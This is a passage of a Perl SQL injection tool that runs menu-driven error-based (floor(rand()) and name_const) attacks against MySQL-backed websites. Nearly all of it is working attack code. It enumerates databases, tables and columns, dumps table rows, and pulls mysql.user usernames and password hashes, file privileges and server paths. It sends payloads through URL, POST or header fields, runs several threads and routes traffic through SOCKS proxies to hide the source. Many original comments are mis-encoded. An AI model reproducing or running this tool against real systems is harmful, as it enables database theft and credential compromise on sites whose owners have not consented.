  4237.                $temp = "(select" . $nc_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "limit" . $nc_plus . $num . ",1)" ;
  4238.                $nc_start1 = $nc_start . $temp;
  4239.                $nc_midle1 = $nc_midle . $temp;
  4240.                $current = $nc_start1 . $nc_midle1 . $nc_end;
  4241.                $content = scan_url();
  4242.                if ($content =~ m/ussr(.*?)ussr/imgs) {   # /s here: a dumped value may span lines
  4243.                     print "   " . $1 . "\n";
  4244.                     print FILE "  "  . $1 . "\n";
  4245.                }
  4246.                print $num . "\r";
  4247.                sleep $pause;   # $pause configured elsewhere in the file
  4248.  
  4249.             }
  4250.          }
  4251.     print "----------\n";
  4252.     print "Saved in " . "z_" . $host . ".txt\n";
  4253.     close(FILE);
  4254.     goto START200;
  4255.     } else {
  4256.     ## fetch rows from the table, with the WHERE condition (original comment mis-encoded; wording inferred) ##
  4257.          print "Count data from [ $table_name  ] with [ where " . $where . " ] \n";
  4258.          $temp = "select" . $nc_plus . $sql_pref1 . "count(*)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "where" . $nc_plus . $where;
  4259.          $nc_start1 = $nc_start . $temp;
  4260.          $nc_midle1 = $nc_midle . $temp;
  4261.          $current = $nc_start1 . $nc_midle1 . $nc_end;
  4262.          $content = scan_url();
  4263.          $column_name_p = $content;
  4264.          $column_name_p =~ m/ussr(.*?)ussr/img;
  4265.          $column_name_p = $1; # matching row count; loop upper bound (original comment mis-encoded)
  4266.          print "$column_name_p\n";
  4267.          print "----------\n";
  4268.          ## start from2 ##
  4269.          print "Get ALL data from " . $table_name . " with [ where " . $where . " ] (" . $column_name_p . ") ? (1/0): ";
  4270.          $choice = <STDIN>;
  4271.          chomp $choice;
  4272.          $thr = $kol_threads; # number of threads (original comment mis-encoded; wording inferred)
  4273.          if ($choice == 1) {
  4274.               $num = -1; # full range (original comment mis-encoded)
  4275.          } else {
                      # 1-based START/END window -> 0-based offsets START-1 .. END-1.
  4276.               print "Enter START_position: ";
  4277.               $choice1 = <STDIN>;
  4278.               chomp $choice1;
  4279.               $num = $choice1-2;
  4280.               print "Enter END_position: ";
  4281.               $choice2 = <STDIN>;
  4282.               chomp $choice2;
  4283.               $column_name_p = $choice2-1;
  4284.               print "Dump records from [" . ($num+2) . "] to [" . ($column_name_p+1) . "]\n";
  4285.          }
  4286.          print "-----------------------------------------\n";
  4287.          print "Request method - $method\n";
  4288.          print "Threads - $kol_threads\n";
  4289.          print "Proxy - $proxy_message\n";
  4290.          print "----------------------\n";
  4291.          ## end from2
                 # $url18 is assigned from the $sql_*/$plus family of prefixes but
                 # is not referenced anywhere in this branch; the worker below
                 # builds its own request from the $nc_* prefixes.
  4292.          $url18 = $sql_start . $sql_CP_start . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $sql_CP_end . $sql_end . $plus . "from" . $plus . $table_name . $plus . "where" . $plus . $where;
  4293.          for(0..$thr) {   # $kol_threads+1 workers
  4294.              $trl[$_] = threads->create(\&gets115);
  4295.          }
  4296.          for(0..$thr) {
  4297.              $trl[$_]->join;
  4298.          }
                 # Worker (with condition): one matching row per iteration.
  4299.          sub gets115 {
  4300.             $| = 1;
  4301.             while ($num<$column_name_p) {
  4302.                { lock($num);
  4303.                $num++; }
  4304.                $temp = "(select" . $nc_plus . $sql_pref1 . "concat_ws(0x3a," . $column_name . ")" . $sql_pref2 . $nc_plus . "from" . $nc_plus . $table_name . $nc_plus . "where" . $nc_plus . $where . $nc_plus . "limit" . $nc_plus . $num . ",1" ;
  4305.                $nc_start1 = $nc_start . $temp;
  4306.                $nc_midle1 = $nc_midle . $temp;
  4307.                $current = $nc_start1 . $nc_midle1 . $nc_end;
  4308.                $content = scan_url();
  4309.                if ($content =~ m/ussr(.*?)ussr/img) {
  4310.                     print "   " . $1 . "\n";
  4311.                     print FILE "  "  . $1 . "\n";
  4312.                }
  4313.                print $num . "\r";
  4314.                sleep $pause;   # $pause configured elsewhere in the file
  4315.  
  4316.             }
  4317.          }
  4318.          print "----------\n";
  4319.          print "Saved in " . "z_" . $host . ".txt\n";
  4320.          close(FILE);
  4321.          goto START200;
  4322.     }
  4323. }# end 4
  4324. if ($choice == 8) {goto START}   # leave the name_const branch; START is presumably the main menu label (not in view)
  4325. } #end name_const
  4326. ########################################################
  4327. # floor(rand())
  4328. if ($choice == 12) {
        # Entry of the floor(rand()) branch (its enclosing "if ($choice == 12)"
        # continues past this run): detect an https:// target and, if the
        # configured login is enabled, perform one POST login before any
        # other request so its session cookie can be reused.
  4329. if ($f_url =~ m/^https:\/\/?([^\/]+)/i) {
  4330.    $host13 = $1;   # host part of the URL (the "/\/?" makes the second slash optional)
  4331.    $https_flag = 1;
  4332.    print "----------------------\n";
  4333.    print "HTTPS mode enabled\n";
  4334.    print "----------------------\n";
  4335. }
  4336. $host = $host13;   # assigned unconditionally; for non-https URLs $host13 keeps whatever value it had before (set elsewhere, if at all)
  4337. if ($https_mode_auth == 1 && $https_auth_check == 0 && $https_flag == 1) {
  4338.     print "-----------------------------------------\n";
  4339.     print "Authorization required, wait please....";
         # req()/collect() are defined elsewhere in the file.  The POST body and
         # script path come from the configuration block at the top of the file;
         # $ck1 is the :shared cookie slot, so collect() presumably extracts
         # Set-Cookie values from the login response -- confirm in collect().
  4340.     my $answ1 = req($host, $https_auth_script_path, 'POST', $https_auth_post_data, 0);
  4341.     $ck1 = collect($answ1);
  4342.     $https_auth_check = 1;   # login is done at most once per run
  4343.     print " DONE\n";
  4344.     print "-----------------------------------------\n";
  4345. }
        # Optional SOCKS selection: probe the entries in $socks_file once per run
        # with a plain "GET /" and keep the first that answers.  The probe
        # request itself is a recognisable artifact: fixed Firefox 3.5 /
        # Ubuntu 9.04 User-Agent, "Connection: close", and a Referer of
        # "http://<target host>".
  4346. if ($use_socks == 1 && $socks_check == 0) {
  4347.   $check_url = $host;
          # Note: the Host header uses $check_host, which is not assigned in this
          # run (only $check_url is); its value, if any, comes from elsewhere.
  4348.   our $query = "GET / HTTP/1.$http_protocol\r\n"
  4349.            . "Host: $check_host\r\n"
  4350.            . "Referer: http://" . $check_url . "\r\n"
  4351.            . "Accept: */*\r\n"
  4352.            . "User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Ubuntu/9.04 (jaunty) Shiretoko/3.5.1\r\n"
  4353.            . "Connection: close\r\n\r\n";
  4354.    print "----------------------------------------\n";
  4355.    print "You choose mode with SOCKS, try to find good in $socks_file ...\n";
  4356.    print "Timeout = 5 sec:\n";
  4357.    print "----------------------------------------\n";
  4358.    $socks_check = 0;
  4359.    $check_socks = socks_check();   # defined elsewhere; expected to return "host:port:type" (see the split below)
  4360.   ($current_proxy_host,$current_proxy_port,$socks_type) = split(/:/,$check_socks);
  4361.   $proxy_message = "$current_proxy_host:$current_proxy_port, SOCKS" . $socks_type;
  4362.   if ($current_proxy_host) {
  4363.      $socks_check = 1;
  4364.      print "Will use --> $proxy_message\n";
  4365.   } else {
  4366.      $socks_check = 0;
  4367.      $proxy_message = "No";
             # Despite the "Exit..." wording no exit happens; execution continues
             # to the mode menu below without a SOCKS proxy.
  4368.      print "No good SOCKS in " . $socks_file . ", change mode. Exit...\n";
  4369.   }
  4370. }
        # Mode menu of the floor(rand()) branch.  START2001 is the label the
        # sub-modes jump back to.  $ff_url selects where the injection string
        # is placed, by $sql_flag: URL query (0), POST body (1) or an HTTP
        # header (2); the value itself is built by the sub-modes that follow.
  4371. START2001:
  4372. print "-------------------------------------------------------------------\n";
  4373. print "               Choose mode:\n";
  4374. print "-------------------------------------------------------------------\n";
  4375. print "    [1] floor(rand()) - system information\n";
  4376. print "    [2] floor(rand()) - get DB-names from information_schema.schemata\n";
  4377. print "    [3] floor(rand()) - get tables from DB-name\n";
  4378. print "    [4] floor(rand()) - get column_name from tables from DB-name\n";
  4379. print "    [5] floor(rand()) - get tables from information_schema (current DB)\n";
  4380. print "    [6] floor(rand()) - get column_name from table (current DB)\n";
  4381. print "    [7] floor(rand()) - get data from columns\n";
  4382. print "    [8] floor(rand()) - Mysql4 inj brute tables and columns\n";
  4383. print "-------------------------------------------------------------------\n";
  4384. print "    [9] Main menu\n";
  4385. print "-------------------------------------------------------------------\n";
  4386. if($sql_flag == 0){
  4387.     $ff_url = $f_url;
  4388. } elsif ($sql_flag == 1) {#POST
  4389.     $ff_url = $sql_post;
  4390. } elsif($sql_flag == 2){#HEADER
  4391.     $ff_url = $sql_header;
  4392. }
  4393. $choice = <STDIN>;
  4394. chomp $choice;   # no validation: a non-numeric answer compares as 0 and matches none of the modes below
  4395. print "Your choice: $choice\n";
  4396. if ($choice==1) {
  4397.      open( FILE, ">>" . "z_" . $host . ".txt" ); # ???? ??? ?????? ???????????
  4398.      #### ?????? ?????? #####################################################
  4399.      $url1 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x7665723a,version())" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4400.      #### ?????? ??? ???? #####################################################
  4401.      $url2 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x626173653a,database())" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4402.      #### ?????? ????? #####################################################
  4403.      $url3 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x757365723a,user()" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4404.      #### ?????? @@basedir #####################################################
  4405.      $url4 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x626173656469723a," .  "@@" . "basedir)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4406.      #### ?????? @@datadir #####################################################
  4407.      $url5 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x646174616469723a," .  "@@" . "datadir)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4408.      #### ?????? @@tmpdir #####################################################
  4409.      #$temp = $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2;
  4410.      $url6 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x746d706469723a," .  "@@" . "tmpdir)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4411.      #### ?????? @@version_compile_os #####################################################
  4412.      #$temp = $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2;
  4413.      $url7 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x6f733a," .  "@@" . "version_compile_os)" . $sql_pref2 . $f_plus . "from" . $f_plus . $f_table . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4414.      #### ?????? mysql.user #####################################################
  4415.      $url8 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x6d7973716c2e757365723a,user)" . $sql_pref2 . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4416.      #### ?????? mysql.password #####################################################
  4417.      $url9 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x6d7973716c2e70617373776f72643a,password)" . $sql_pref2 . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4418.      #### ?????? file_priv #####################################################
  4419.      #$temp = "(select" . $nc_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $nc_plus . "from" . $nc_plus . "mysql.user" . $nc_plus . "where" . $nc_plus . "user=user)";
  4420.      $url10 = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "concat(0x66696c655f707269763a,file_priv)" . $sql_pref2 . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "where" . $f_plus . "user=user" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . "mysql.user" . $f_plus . "where" . $f_plus . "user=user" . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4421.      #####################################################################
  4422.      $thr = $kol_threads; # ???-?? ???????
  4423.      $num = -1; # ?? ????????
  4424.      print "-----------------------------------------\n";
  4425.      print "System information:\n";
  4426.      print "-----------------------------------------\n";
  4427.      print FILE  "-----------------------------------------\n";
  4428.      print FILE  "SQL: $url1\n";
  4429.      print FILE "-----------------------------------------\n";
  4430.      print FILE "System information:\n";
  4431.      print FILE "-----------------------------------------\n";
  4432.      print "Request method - $method\n";
  4433.      print "Threads - $kol_threads\n";
  4434.      print "Proxy - $proxy_message\n";
  4435.      print "----------------------\n";
  4436.      for(0..$thr) {
  4437.         $trl[$_] = threads->create(\&gets111000);
  4438.      }
  4439.      for(0..$thr) {
  4440.         $trl[$_]->join;
  4441.      }
  4442.      sub gets111000 {
  4443.         @array = ($url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11);
  4444.         $size = @array; #???????? ?????? ???????
  4445.         $| = 1;
  4446.         while ($num<$size) {
  4447.             { lock($num);
  4448.             $num++; }
  4449.            if($sql_flag == 0){
  4450.               $current = $array[$num];
  4451.               $content = scan_url();
  4452.             } elsif ($sql_flag == 1) {#POST
  4453.               $current = $f_url;
  4454.               $sql_post = $array[$num];
  4455.               $content = scan_url_POST();
  4456.             } elsif($sql_flag == 2){#HEADER
  4457.               $current = $f_url;
  4458.               $sql_header_query = $array[$num];
  4459.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4460.               $content = scan_url_HEADER();
  4461.             }
  4462.             if ($content =~ m/ussr(.*?)ussr/img) {
  4463.                   print $1 . "\n";
  4464.                   print FILE $1 . "\n";
  4465.             }
  4466.             print $num . "\r";
  4467.             sleep $pause;
  4468.             $current="";
  4469.             $content="";
  4470.             $sql_post="";
  4471.             $sql_header_query="";
  4472.         }
  4473.      }
  4474.      print "----------\n";
  4475.      print "Saved in " . "z_" . $host . ".txt\n";
  4476.      close(FILE);
  4477.      goto START2001;
  4478. }#end 1
  4479. # DB from schemata
  4480. if ($choice == 2) {
  4481.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4482.      ## ???-?? ?? ? information_schema.schemata ##
  4483.      if($sql_flag == 0){
  4484.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4485.               $content = scan_url();
  4486.             } elsif ($sql_flag == 1) {#POST
  4487.               $current = $f_url;
  4488.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4489.               $content = scan_url_POST();
  4490.             } elsif($sql_flag == 2){#HEADER
  4491.               $current = $f_url;
  4492.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(schema_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4493.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4494.               $content = scan_url_HEADER();
  4495.             }
  4496.      $bd_num = $content;
  4497.      $bd_num =~ m/ussr(.*?)ussr/img;
  4498.      $bd_num = $1-1;
  4499.      $current="";
  4500.      $content="";
  4501.      $sql_post="";
  4502.      $sql_header_query="";  
  4503.      print FILE "-----------------------------------------\n";
  4504.      print FILE "Data bases in information_schema.schemata: $bd_num\n";
  4505.      print FILE "-----------------------------------------\n";
  4506.      print "-----------------------------------------\n";
  4507.      print "Data bases in information_schema.schemata - $1\n";
  4508.      print "-----------------------------------------\n";
  4509.      $num = -1; # ?? ????????
  4510.      $thr = $kol_threads; # ???-?? ???????
  4511.      print "Request method - $method\n";
  4512.      print "Threads - $kol_threads\n";
  4513.      print "Proxy - $proxy_message\n";
  4514.      print "----------------------\n";
  4515.      for(0..$thr) {
  4516.          $trl[$_] = threads->create(\&gets5050999);
  4517.      }
  4518.      for(0..$thr) {
  4519.          $trl[$_]->join;
  4520.      }
  4521.      sub gets5050999 {
  4522.        $| = 1;
  4523.        while ($num<$bd_num) {
  4524.          { lock($num);
  4525.          $num++; }
  4526.          if($sql_flag == 0){
  4527.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4528.               $content = scan_url();
  4529.             } elsif ($sql_flag == 1) {#POST
  4530.               $current = $f_url;
  4531.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4532.               $content = scan_url_POST();
  4533.             } elsif($sql_flag == 2){#HEADER
  4534.               $current = $f_url;
  4535.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "schema_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.schemata" . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4536.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4537.               $content = scan_url_HEADER();
  4538.             }
  4539.          if ($content =~ m/ussr(.*?)ussr/img) {
  4540.                   print $1 . "\n";
  4541.                   print FILE $1 . "\n";
  4542.          }
  4543.          print $num . "\r";
  4544.          sleep $pause;
  4545.             $current="";
  4546.             $content="";
  4547.             $sql_post="";
  4548.             $sql_header_query="";
  4549.        }
  4550.      }
  4551.     print "----------\n";
  4552.     print "Saved in " . "z_" . $host . ".txt\n";
  4553.     close(FILE);
  4554.     goto START2001;
  4555. } # end DB
  4556. # tables from DB from schemata
  4557. if ($choice == 3) {
  4558.      sub ascii_to_hex ($) {
  4559.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  4560.             $str = "0x" . $str;
  4561.             return $str;
  4562.      }
  4563.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4564.      print "-----------------------------------------\n";
  4565.      print "Enter the DB-name: ";
  4566.      $choice = <STDIN>;
  4567.      chomp $choice;
  4568.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  4569.      print "DB-name: $choice\n";
  4570.      print "----------\n";
  4571.      $choice1 = ascii_to_hex $choice;
  4572.      ## ???-?? tables ? information_schema.schemata ##
  4573.      if($sql_flag == 0){
  4574.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4575.               $content = scan_url();
  4576.             } elsif ($sql_flag == 1) {#POST
  4577.               $current = $f_url;
  4578.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4579.               $content = scan_url_POST();
  4580.             } elsif($sql_flag == 2){#HEADER
  4581.               $current = $f_url;
  4582.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(table_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4583.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4584.               $content = scan_url_HEADER();
  4585.             }    
  4586.      $bd_num = $content;
  4587.      $bd_num =~ m/ussr(.*?)ussr/img;
  4588.      $bd_num = $1;
  4589.             $current="";
  4590.             $content="";
  4591.             $sql_post="";
  4592.             $sql_header_query="";
  4593.      print FILE "-----------------------------------------\n";
  4594.      print FILE "Tables in $choice: $bd_num\n";
  4595.      print FILE "-----------------------------------------\n";
  4596.      print "-----------------------------------------\n";
  4597.      print "Tables in $choice: $bd_num\n";
  4598.      print "-----------------------------------------\n";
  4599.      $num = -1; # ?? ????????
  4600.      $thr = $kol_threads; # ???-?? ???????
  4601.      print "Request method - $method\n";
  4602.      print "Threads - $kol_threads\n";
  4603.      print "Proxy - $proxy_message\n";
  4604.      print "----------------------\n";
  4605.      for(0..$thr) {
  4606.          $trl[$_] = threads->create(\&gets5050888);
  4607.      }
  4608.      for(0..$thr) {
  4609.          $trl[$_]->join;
  4610.      }
  4611.      sub gets5050888 {
  4612.        $| = 1;
  4613.        while ($num<$bd_num) {
  4614.          { lock($num);
  4615.          $num++; }
  4616. if($sql_flag == 0){
  4617.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4618.               $content = scan_url();
  4619.             } elsif ($sql_flag == 1) {#POST
  4620.               $current = $f_url;
  4621.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4622.               $content = scan_url_POST();
  4623.             } elsif($sql_flag == 2){#HEADER
  4624.               $current = $f_url;
  4625.               $sql_header_query = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "table_name" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.tables" . $f_plus . "where" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . $num . ",1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . $num . ",1)" . $f_filtr;
  4626.               $sql_header_query =~ s!\Q$search!$replacement!g;
  4627.               $content = scan_url_HEADER();
  4628.             }          
  4629.        if ($content =~ m/ussr(.*?)ussr/img) {
  4630.                   print $1 . "\n";
  4631.                   print FILE $1 . "\n";
  4632.          }
  4633.          print $num . "\r";
  4634.          sleep $pause;
  4635.             $current="";
  4636.             $content="";
  4637.             $sql_post="";
  4638.             $sql_header_query="";
  4639.  
  4640.        }
  4641.      }
  4642.     print "----------\n";
  4643.     print "Saved in " . "z_" . $host . ".txt\n";
  4644.     close(FILE);
  4645.     goto START2001;
  4646. } # end tables from DB
  4647. # columns tables from tables from DB
  4648. if ($choice == 4) {
  4649.      sub ascii_to_hex ($) {
  4650.             (my $str = shift) =~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;
  4651.             $str = "0x" . $str;
  4652.             return $str;
  4653.      }
  4654.      open( FILE, ">>" . "z_" .$host . ".txt" ); # ???? ??? ?????? ???????????
  4655.      print "-----------------------------------------\n";
  4656.      print "Enter the DB-name: ";
  4657.      $choice = <STDIN>;
  4658.      chomp $choice;
  4659.      if ($choice =~ m/-/imgs) {$choice = "`" . $choice . "`"}
  4660.      $choice1 = ascii_to_hex $choice;
  4661.      print "DB-name: $choice\n";
  4662.      print "----------\n";
  4663.      $choice1 = ascii_to_hex $choice;
  4664.      print "-----------------------------------------\n";
  4665.      print "Enter the TABLE-name: ";
  4666.      $choice2 = <STDIN>;
  4667.      chomp $choice2;
  4668.      if ($choice2 =~ m/-/imgs) {$choice2 = "`" . $choice2 . "`"}
  4669.         $choice3 = ascii_to_hex $choice2;
  4670.      print "TABLE-name: $choice2\n";
  4671.      print "----------\n";
  4672.      if($sql_flag == 0){
  4673.               $current = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4674.               $content = scan_url();
  4675.      } elsif ($sql_flag == 1) {#POST
  4676.               $current = $f_url;
  4677.               $sql_post = $ff_url . "(select". $f_plus . "count(0),concat((select" . $f_plus . $sql_pref1 . "count(column_name)" . $sql_pref2 . $f_plus . "from" . $f_plus . "information_schema.columns" . $f_plus  . "where" . $f_plus . "table_name=" . $choice3 . $f_plus . "and" . $f_plus . "table_schema=" . $choice1 . $f_plus . "limit" . $f_plus . "0,1),floor(rand(0)*2))" . $f_plus . "from" . $f_plus . $f_table . $f_plus . "group" . $f_plus . "by" . $f_plus . "2" . $f_plus . "limit" . $f_plus . "0,1)" . $f_filtr;
  4678.               $content = scan_url_POST();
  4679.      } elsif($sql_flag == 2){#HEADER
  4680.               $current = $f_url;
